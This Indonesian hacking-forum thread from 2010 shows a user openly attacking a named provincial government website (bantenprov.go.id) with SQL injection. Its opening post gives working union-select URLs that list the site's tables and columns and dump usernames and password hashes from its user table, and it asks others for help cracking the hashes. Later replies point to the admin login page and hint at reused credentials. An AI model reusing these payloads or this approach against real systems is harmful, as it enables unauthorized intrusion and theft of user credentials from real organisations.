Page 1 of 4

hole di http://bantenprov.go.id/ untuk sqli

Posted: Tue May 11, 2010 8:58 pm
by cyber_criminal
thread ini saya buat untuk menggantikan postingan saya tentang sqli di http://www.nexian.co.id/,
ok langsung aja, karena bug sqli di situs di http://www.nexian.co.id/ udah di patch maka saya coba nyari situs yg lain, terus ketemu deh bug sqli di http://bantenprov.go.id/

ini dia holenya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=6932'
trus saya injeksi, dpat deh isi tablenya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Image

ini isi column dari table pengguna

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.columns%20where%20table_name=0x70656e6767756e61%20%20--
Image

dan ini dia hasilnya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28user_name,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20pengguna
Image

tapi sayangnya saya belum dapat login pagenya dan hashnya tidak berhasil saya crack, tolong bantuannya ya
:kaca: :kaca: :kaca:

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Wed May 12, 2010 7:13 am
by 3xtr3m3b0y
Search with Google using this keyword:
login site:bantenprov.go.id

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Wed May 12, 2010 8:16 am
by cyber_criminal
hashnya sulit di crack mas
:cry: :cry: :cry:

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Thu May 13, 2010 9:07 pm
by win32error
monggo modah2an membantu :licik:
coba deh masuk nya lewat page ini http://banten.go.id/admin
itu page login web nya..ada dua domain nya..yang buat page login nya yang di atas nah buat tampilan depan nya yang http://bantenprov.go.id
usernya pake yang az*s passnya idem

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Fri May 14, 2010 8:39 am
by 3xtr3m3b0y
win32error wrote:monggo modah2an membantu :licik:
coba deh masuk nya lewat page ini http://banten.go.id/admin
itu page login web nya..ada dua domain nya..yang buat page login nya yang di atas nah buat tampilan depan nya yang http://bantenprov.go.id
usernya pake yang az*s passnya idem

Code: Select all

$nslookup banten.go.id
Non-authoritative answer:
Name:	banten.go.id
Address: 69.175.104.74

$nslookup bantenprov.go.id
Non-authoritative answer:
Name:	bantenprov.go.id
Address: 118.97.113.84
Jumping machine to machine...???
Itu cmn di redirect dari web lama ke yg baru

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Fri May 14, 2010 9:43 am
by win32error
jadi gitu to ... :circle:

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Fri May 14, 2010 10:37 pm
by cyber_criminal
terima kasih atas pencerahannya,
:malumalu: :malumalu: :malumalu:

tapi hashnya masih belum berhasil saya crack
:kaca: :kaca: :kaca:

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Fri May 14, 2010 11:29 pm
by Digital Cat
wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Sat May 15, 2010 9:24 pm
by cyber_terror1st
Digital Cat wrote:wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

hahahah
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:
mantap kk digital cat
:malumalu: :malumalu:

Re: hole di http://bantenprov.go.id/ untuk sqli

Posted: Sun May 16, 2010 7:28 am
by juara1
cyber_terror1st wrote:
Digital Cat wrote:wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

hahahah
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:
mantap kk digital cat
:malumalu: :malumalu:
kalo ada duitnya c monggo2 aja .. hehehehe :ngakak: :ngakak: